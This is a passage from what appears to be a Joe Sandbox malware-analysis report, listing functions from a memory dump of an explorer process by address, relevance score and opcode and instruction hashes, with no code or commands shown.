                                  • Opcode Fuzzy Hash: 691fc1d1a3f387eb9eb6a7cf95666276b830a1ccfde6c9e028b2dbb690bfc4fa
                                  • Instruction Fuzzy Hash: 1D517030E0E64E8EEB64EBA4C8646FDBBF1EF15314F41417AD409D71A2DE786A44CB21
                                  Function 00007FFD9BAABD70 Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 708b3d8c2cec773863ba747ddb3d0aadb473b080f131be313a2d0341f1720ab1
                                  • Instruction ID: 2c0bbc7010bdcd93debe7ef65e546076838b08553cdd8cbc5ea6d367fcb86a10
                                  • Opcode Fuzzy Hash: 708b3d8c2cec773863ba747ddb3d0aadb473b080f131be313a2d0341f1720ab1
                                  • Instruction Fuzzy Hash: 14518530A5E78E8FE7669B7488251F97FB0FF16300F4505BBD458C60E2EA78A648C751
                                  Function 00007FFD9BAB0B80 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc20de9b53b7664c9bb064d54c148468dca9291b0482f02137da5ab6088869f2
                                  • Instruction ID: 3a333420b347b52f9d9469485cd4417bba23b72b696259e38d4201cab4eea882
                                  • Opcode Fuzzy Hash: cc20de9b53b7664c9bb064d54c148468dca9291b0482f02137da5ab6088869f2
                                  • Instruction Fuzzy Hash: 6151BE30A0A64E8FDBA5EF64C8695BA7BF1FF1A304F0144BBD419C71A2DB74A544CB41
                                  Function 00007FFD9BAAC6D3 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86ecfa63658dac850a9ee92eb68c94eb6eb3c92f5201ac4c312281b0c1205c78
                                  • Instruction ID: 5994e587a2fa12221e06e73a63dd005b0eb87236ea7bcbdb5aa81ad2441d6212
                                  • Opcode Fuzzy Hash: 86ecfa63658dac850a9ee92eb68c94eb6eb3c92f5201ac4c312281b0c1205c78
                                  • Instruction Fuzzy Hash: 38510A26B0D6564BF726B7ACAC714F93B60DF1633AB0502B7E55DC90E3DA2C3545C2A0
                                  Function 00007FFD9BAAAD60 Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 895a9eb57fe8e10c74fa5afad2d6763963a14227fe392b8ac558c6620dee5e49
                                  • Instruction ID: bcf7714c16675e3d514e8476424f01035409db62e7cb5747d7751a200383ef41
                                  • Opcode Fuzzy Hash: 895a9eb57fe8e10c74fa5afad2d6763963a14227fe392b8ac558c6620dee5e49
                                  • Instruction Fuzzy Hash: 9851AE30A0A64E8FDB69EF64C8682BD7BB1FF19304F4508BED419C61E2DB75A644CB10
                                  Function 00007FFD9BAA2E99 Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a87e5bb870ee687cd6ad493c6cf5d07f5e62f7ec59868f4db4680740c517f9f1
                                  • Instruction ID: 14c34a38a6288428da16d3cabe7f1492e0a7f6732c45d778996fd114ec99364e
                                  • Opcode Fuzzy Hash: a87e5bb870ee687cd6ad493c6cf5d07f5e62f7ec59868f4db4680740c517f9f1
                                  • Instruction Fuzzy Hash: 5E51CB30A5E38E8FE7619BB489252FA7FF1EF05300F05457AD448D60E2EAB86658C761
                                  Function 00007FFD9BAA3108 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa1b11f3f98f8d2d0f43bdd722ee3908c3febc7af0c134b399eaf06eda1a8c7b
                                  • Instruction ID: 98ef9cd25070936442592bb1aa28409787daac22626617fa26fb05b2386ab832
                                  • Opcode Fuzzy Hash: aa1b11f3f98f8d2d0f43bdd722ee3908c3febc7af0c134b399eaf06eda1a8c7b
                                  • Instruction Fuzzy Hash: 62518730A4F38D4FE7619BB488256E97FF1AF46300F4545BBD448D70E2DA686A08C761
                                  Function 00007FFD9BAABDE0 Relevance: .2, Instructions: 151COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df1e4fbfb42a09b2d2f59012020d6b76be87ed747a68448270476efc3c231982
                                  • Instruction ID: 9b3953ecc08b2f70b1349c5d74ea523b7211d29010262e7055f2bb7e6f0b19a4
                                  • Opcode Fuzzy Hash: df1e4fbfb42a09b2d2f59012020d6b76be87ed747a68448270476efc3c231982
                                  • Instruction Fuzzy Hash: 0C51A130A5E78E8FDB669F6488282F97BB0FF06300F4505BBD458C60E2DB78A648C751
                                  Function 00007FFD9BAA371F Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 206ec6109975a7434b80cf796a9e0a41906f93ca8bc401223180bee724bd5809
                                  • Instruction ID: 5a2804808afb9c6720610b33300a5ce9e6051830f586679ae10dcee8d20d6906
                                  • Opcode Fuzzy Hash: 206ec6109975a7434b80cf796a9e0a41906f93ca8bc401223180bee724bd5809
                                  • Instruction Fuzzy Hash: B541A372A18A0D8FE758DF5CD8543A87BE1FB99324F50027ED018C72D9CBF514098B80
                                  Function 00007FFD9BAB0C08 Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09396d62a30d305dc786ebf681feb920fb6523aec19c76081e700d51b6c45d16
                                  • Instruction ID: fa566c1a07b0950cd3ade3de8cddc2765a3ac2ec1309420cf598c139db024b20
                                  • Opcode Fuzzy Hash: 09396d62a30d305dc786ebf681feb920fb6523aec19c76081e700d51b6c45d16
                                  • Instruction Fuzzy Hash: 05418130A0E65E8FEBB5AF64C8696FA7BE1FF16700F01057BD418C71A1DBB4A6448B41
                                  Function 00007FFD9BAA0500 Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba19c26cc089e4365544772ac180f3b78ad95ffb77b887d6b55dacd41888338f
                                  • Instruction ID: 08896dfc43d74c825db5e1a62186dda21e215024147bf966bff2e0023638b183
                                  • Opcode Fuzzy Hash: ba19c26cc089e4365544772ac180f3b78ad95ffb77b887d6b55dacd41888338f
                                  • Instruction Fuzzy Hash: 7341A030A1974E8FDB55EBA4C9685A97BF1FF19300F0144BAD419C70A6DA78E654CB10
                                  Function 00007FFD9BAABB0A Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e7def2a8bb151602e47725cfd25aa538322e896a0e0e0efe894452e1dee3908
                                  • Instruction ID: 21813b1bb434530979804562a56d0520c8129154b75566f598710dd1858f5189
                                  • Opcode Fuzzy Hash: 2e7def2a8bb151602e47725cfd25aa538322e896a0e0e0efe894452e1dee3908
                                  • Instruction Fuzzy Hash: 0A418C30E0A64D8EEB64EFA4C8686FD7BE1EF19300F41457AD019E31E5DA78A6448B20
                                  Function 00007FFD9BAA3140 Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b40d3a1063969bf6079420ddfc8f27475a92ddc4ed172d76bd0f9f93fc268d2
                                  • Instruction ID: af2f8c89ca9ba10b3f172558770afa7455a339f8c1b907c880102a9efe50dbe3
                                  • Opcode Fuzzy Hash: 0b40d3a1063969bf6079420ddfc8f27475a92ddc4ed172d76bd0f9f93fc268d2
                                  • Instruction Fuzzy Hash: 9841A230E5E64E4FEB61EB7888696F97BE1EF59300F0645B7D408C70B1EE78A6448B11
                                  Function 00007FFD9BAA28ED Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8024bd49ffbb4e08d68fb3f14a5beabb3bf07bcf7afd8f5b27ef511fcb10a43d
                                  • Instruction ID: aa3ecff35381adac2a236109e751b02e8685725efc657de6a02fd439bffbe29f
                                  • Opcode Fuzzy Hash: 8024bd49ffbb4e08d68fb3f14a5beabb3bf07bcf7afd8f5b27ef511fcb10a43d
                                  • Instruction Fuzzy Hash: 9F413C35B0935A4FD315FB7CD8A49E83B60EF95326B0946F7D188CE0E7CA28A449C751
                                  Function 00007FFD9BAACBD0 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3ec1eeb8d982876ea0e964d1b9140d2b02a4ae2dc95677243d810a500f174f9
                                  • Instruction ID: 9dce94c4ee05649dd4a1bc50478d2378377af1a94772d10f4c94f37c726c4ea8
                                  • Opcode Fuzzy Hash: c3ec1eeb8d982876ea0e964d1b9140d2b02a4ae2dc95677243d810a500f174f9
                                  • Instruction Fuzzy Hash: EA41EB30A0AA4E4FEBA9DF6884752B9B7E0FF19304F11447ED42DC61E2DE75A544CB41
                                  Function 00007FFD9BAA1190 Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 457ef2d97c1038186ec1f909fde355d67a60fdbfefec1cd40c86248e50adfbea
                                  • Instruction ID: 7a0901aae7e2fdb536ef91f672460fe33f48c2a59d69e39f3ab6a0e389ffcd6d
                                  • Opcode Fuzzy Hash: 457ef2d97c1038186ec1f909fde355d67a60fdbfefec1cd40c86248e50adfbea
                                  • Instruction Fuzzy Hash: 44312730E0E68E4FEBA9AB6884346B97BE1FF66304F01057ED41EC71E2DEA86544C750
                                  Function 00007FFD9BAA11E8 Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4579d38133c419e31270ef2bd06245a69b581637fd736b4c2c37b2c93d5872c3
                                  • Instruction ID: aa73b5e0390ef2d3402ada897d66d2eacb48ce9586718b61f103167b87fe6e23
                                  • Opcode Fuzzy Hash: 4579d38133c419e31270ef2bd06245a69b581637fd736b4c2c37b2c93d5872c3
                                  • Instruction Fuzzy Hash: F831E531E0964E4FEB95EB68C4246FD77E2FF6A310F05017AD019D71E2DEA5A904C790
                                  Function 00007FFD9BAA22B8 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 754c00bf2409ce1d7c2b90c4810ae1ad9e7ead420838b53167b3156ec7b16322
                                  • Instruction ID: ac8a5fa0c0f319c54c49c7f817ab160ca1fc5fe265adb2661148d4483f79f1f0
                                  • Opcode Fuzzy Hash: 754c00bf2409ce1d7c2b90c4810ae1ad9e7ead420838b53167b3156ec7b16322
                                  • Instruction Fuzzy Hash: E931D735E0F74E8BF774ABE085312F8B6A2FF46300F42117AD45D960E2DEA86A54C761
                                  Function 00007FFD9BAA1C25 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8564d350a74877e5f9f7eb1e25fe65bc6d31db9b5f3fcbb470598dd75fb015b
                                  • Instruction ID: 949c93107caca2cd4ec17c9e7faf1cd5a91b987e56f3214e9f8cc2b648546d23
                                  • Opcode Fuzzy Hash: d8564d350a74877e5f9f7eb1e25fe65bc6d31db9b5f3fcbb470598dd75fb015b
                                  • Instruction Fuzzy Hash: 83310531A0E78D8FDB659F2488651F97FA1FF66304F4501BED808C70E2DAB9A618C741
                                  Function 00007FFD9BAA2F28 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6098a332cac628e231b97dce8284d3a6702471101f63e85ed316be6e15ae1fba
                                  • Instruction ID: 755f24784b7d2b77c4f182a840245dc9633537eee4ac40146a5942d034010dec
                                  • Opcode Fuzzy Hash: 6098a332cac628e231b97dce8284d3a6702471101f63e85ed316be6e15ae1fba
                                  • Instruction Fuzzy Hash: F541CC70A0E38E8FE7619BF489253F97BE1AF05300F054576D408D61E2EBB8A758C751
                                  Function 00007FFD9BAA271D Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84e92cc9657dc69533e357d4ca42472fad2b1a4d7aa269c81b56406e87f51f05
                                  • Instruction ID: 73927ed23742f73d26f4426617601eb1e2c642b63a3198bb7dcbe4ee10d80375
                                  • Opcode Fuzzy Hash: 84e92cc9657dc69533e357d4ca42472fad2b1a4d7aa269c81b56406e87f51f05
                                  • Instruction Fuzzy Hash: A931B53091E38E8FDB669F7489641A57FB0FF16200F0644BBE848C60E2E678E664CB11
                                  Function 00007FFD9BAAC7E0 Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca39a5056b827c4ce39c1473e08da2e6f08371edfcbe3ccc935e6e444a6b35fb
                                  • Instruction ID: a579f6471563c9e9028690b8e547ddaca3180a5bd3089f00ae2d7bb91861ea46
                                  • Opcode Fuzzy Hash: ca39a5056b827c4ce39c1473e08da2e6f08371edfcbe3ccc935e6e444a6b35fb
                                  • Instruction Fuzzy Hash: 5E312531A0E38A4FE716AB7898754F97FB0EF16329B0501FBE459CA0E3DA386444C751
                                  Function 00007FFD9BAAC064 Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 339deb279b26465b12d10da2e9c71692d6dc447f484606a3cc9bc1d2fb81c552
                                  • Instruction ID: 5001e1d9fd37df29a8113954feb363ab6a2a1b563af9cb226b730dea40b73ce6
                                  • Opcode Fuzzy Hash: 339deb279b26465b12d10da2e9c71692d6dc447f484606a3cc9bc1d2fb81c552
                                  • Instruction Fuzzy Hash: E431BB74F1991D9FEBA4EB98C8A56BCB7F6FF58300F51013AD00DE3292DE6869418B50
                                  Function 00007FFD9BAA31A8 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ffa839e125c9e25a6acd7aebb23bf8819e3e6e7fbaeb7cb53c59f3027be145d
                                  • Instruction ID: 457c97b81d753c503249a07516abbf6b5935daf3f4235dad49a13b9c17dd622a
                                  • Opcode Fuzzy Hash: 7ffa839e125c9e25a6acd7aebb23bf8819e3e6e7fbaeb7cb53c59f3027be145d
                                  • Instruction Fuzzy Hash: 7131A230E0E64E8EEB60EBA4C8246FD7BE1AF55304F41457AD409D61E2DFB86A048B61
                                  Function 00007FFD9BAAC0DC Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 327253b8c8d9a64d56a732308166e5802dec9837574de66a51560818a326bb31
                                  • Instruction ID: 059a10c0995fb91e0823050156918eac3f8d248e62d30566ccd5e893a5dbe1ba
                                  • Opcode Fuzzy Hash: 327253b8c8d9a64d56a732308166e5802dec9837574de66a51560818a326bb31
                                  • Instruction Fuzzy Hash: 3421F074F1991D8FEBA4EBA8C8656BCBBF6FF59300F51012AD00DE3292DE6469418B50
                                  Function 00007FFD9BAAAAE8 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5bf0d01e0ee056cb321442ff3582c506addcf93b75bca18dc7dcfe44a68f266
                                  • Instruction ID: df1b99fc3fed42bc167caa3ba017a560b81a7b3732769ac977ca717ef3c23282
                                  • Opcode Fuzzy Hash: d5bf0d01e0ee056cb321442ff3582c506addcf93b75bca18dc7dcfe44a68f266
                                  • Instruction Fuzzy Hash: B5313A30A0A62E8AEB78DB54D864AFE77B1FF55304F01057EC01ED72D4DBB56A44CA40
                                  Function 00007FFD9BAA05F0 Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c0ca2eda1d18b3b6c574aa93edfd23648e8aabd729b0e620f991927c0795629
                                  • Instruction ID: 064588d69fa9ee302826e0a85e5e4eac278293a13c7ed6c7c4c5f04b1ad54e74
                                  • Opcode Fuzzy Hash: 1c0ca2eda1d18b3b6c574aa93edfd23648e8aabd729b0e620f991927c0795629
                                  • Instruction Fuzzy Hash: E521B130A0A64E9FDB98EF64C4656BA77E1FF26304F01047ED81DC21E1DA75A650CB50
                                  Function 00007FFD9BAA2F98 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 276e7a1d87e81a1b5677adcd782b22af6fa8775a479e61f3710f26c7160185b6
                                  • Instruction ID: 2e48e999c484d673a8fcea1d9c1a7f85c72dd098af75ba7443103d11a48c87cf
                                  • Opcode Fuzzy Hash: 276e7a1d87e81a1b5677adcd782b22af6fa8775a479e61f3710f26c7160185b6
                                  • Instruction Fuzzy Hash: 0421D670A0E68E8EE7619BE489253FE7BE1AF05300F050575D409D61E2EBB8A758C6A1
                                  Function 00007FFD9BAA0A01 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d5c12af967130778e3bba9ca7e3a3ee7990c5c14b2f2ade7e49d653c9174160
                                  • Instruction ID: c8f81ca1d00f0000e82631bdeda99a5cc33e83b929faadea87d84ae3a3417d5b
                                  • Opcode Fuzzy Hash: 7d5c12af967130778e3bba9ca7e3a3ee7990c5c14b2f2ade7e49d653c9174160
                                  • Instruction Fuzzy Hash: 6A11C431F0A50E4FE7A0EBA8C8591BD7BE1FF58710F4145B6D41CC70A6EE78A6448710
                                  Function 00007FFD9BAA3218 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16917d0b27aad3f848c8602e4d450cf5d8f625097ce0ff6d08994e93e9dd5996
                                  • Instruction ID: 01c4e895ddde2e17de209415e91a33efae010eac12900d04446642d631715453
                                  • Opcode Fuzzy Hash: 16917d0b27aad3f848c8602e4d450cf5d8f625097ce0ff6d08994e93e9dd5996
                                  • Instruction Fuzzy Hash: 38216270E0A50E8EEB60EBA4C5247EDB7F1BF54300F514539D009E31D1DFB86A048B61
                                  Function 00007FFD9BAA04F8 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de933d60a22e0dc9cd5a5c510212ba34b2f402f89c7d29da5aa17766226bf78a
                                  • Instruction ID: 8cb67dcdbd02bc1e1167ff23248dfff7cf65c7d339076c79ea31dc1e86758e7f
                                  • Opcode Fuzzy Hash: de933d60a22e0dc9cd5a5c510212ba34b2f402f89c7d29da5aa17766226bf78a
                                  • Instruction Fuzzy Hash: 9611E93091E78E8FD7659FB489241F97BA0FF15304F0144BAE818C20E1DB78E664CB11
                                  Function 00007FFD9BAA05D8 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ced4291df9fed350db8816ff1e8528b725366af551046e4d43d5221a6038c2c7
                                  • Instruction ID: b7f6b0071f43ab8bebbd919832f45e77e9ee77aef4b03ac2665a25b3f9dcadc2
                                  • Opcode Fuzzy Hash: ced4291df9fed350db8816ff1e8528b725366af551046e4d43d5221a6038c2c7
                                  • Instruction Fuzzy Hash: FC01B130A0950E9FDB98EF64C4656BA77E2FF6A304F11447ED41EC31A4CE75A650CB50
                                  Function 00007FFD9BAAADFA Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
